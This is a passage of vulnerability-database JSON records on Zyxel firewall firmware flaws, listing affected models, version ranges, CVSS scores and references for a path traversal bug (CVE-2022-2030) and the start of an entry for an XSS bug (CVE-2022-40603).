                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn1000_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn1000:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn300_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn300:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:vpn50_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:vpn50:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_2200-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_2200-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_110_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_110:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_1100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_1100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.20",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-2030"
          }
        ]
      },
      "cve": "CVE-2022-2030",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.5,
                "baseSeverity": "Medium",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-2030",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-2030",
                "trust": 1.8,
                "value": "MEDIUM"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-2030",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202207-1613",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-2030"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-2030"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1613"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A directory traversal vulnerability caused by specific character sequences within an improperly sanitized URL was identified in some CGI programs of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.11 through 4.72, that could allow an authenticated attacker to access some restricted files on a vulnerable device. usg flex 100w firmware, USG FLEX 200 firmware, USG FLEX 500 firmware etc. ZyXEL The product contains a path traversal vulnerability.Information may be obtained",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-2030"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-2030"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-2030",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013719",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1613",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-2030",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-2030"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-2030"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1613"
          }
        ]
      },
      "id": "VAR-202207-1385",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.2867630485714286
      },
      "last_update_date": "2023-12-18T11:55:49.322000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel USG FLEX Repair measures for path traversal vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=201960"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1613"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.0
          },
          {
            "problemtype": "Path traversal (CWE-22) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-2030"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/support/zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2030"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-2030/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-2030"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-2030"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1613"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-2030"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-2030"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1613"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-07-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-2030"
          },
          {
            "date": "2023-09-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          },
          {
            "date": "2022-07-19T06:15:08.383000",
            "db": "NVD",
            "id": "CVE-2022-2030"
          },
          {
            "date": "2022-07-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202207-1613"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-07-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-2030"
          },
          {
            "date": "2023-09-11T08:18:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          },
          {
            "date": "2022-07-29T22:00:11.850000",
            "db": "NVD",
            "id": "CVE-2022-2030"
          },
          {
            "date": "2022-08-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202207-1613"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1613"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 Past traversal vulnerabilities in products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013719"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1613"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202212-1097

    Vulnerability from variot - Updated: 2023-12-18 11:55

    A cross-site scripting (XSS) vulnerability in the CGI program of Zyxel ZyWALL/USG series firmware versions 4.30 through 4.72, VPN series firmware versions 4.30 through 5.31, USG FLEX series firmware versions 4.50 through 5.31, and ATP series firmware versions 4.32 through 5.31, which could allow an attacker to trick a user into visiting a crafted URL with the XSS payload. Then, the attacker could gain access to some browser-based information if the malicious script is executed on the victim’s browser. ATP800 firmware, ATP700 firmware, ATP500 firmware etc. ZyXEL A cross-site scripting vulnerability exists in the product.Information may be obtained and information may be tampered with

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202212-1097",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "usg60",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn50",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg flex 200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "usg40",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg60w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "atp800",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 50w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "usg40w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "usg40",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp700",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "atp100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "atp500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "usg40w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.30"
          },
          {
            "model": "usg flex 500",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "vpn300",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "usg60",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.32"
          },
          {
            "model": "atp200",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "vpn100",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn1000",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.31"
          },
          {
            "model": "usg60w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.72"
          },
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.50"
          },
          {
            "model": "vpn1000",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn300",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg60w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg40w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp500",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 50w",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp800",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg flex 200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp200",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp100",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg40",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "atp700",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "vpn50",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          },
          {
            "model": "usg60",
            "scope": null,
            "trust": 0.8,
            "vendor": "zyxel",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-022564"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-40603"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.31",
                        "versionStartIncluding": "4.32",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
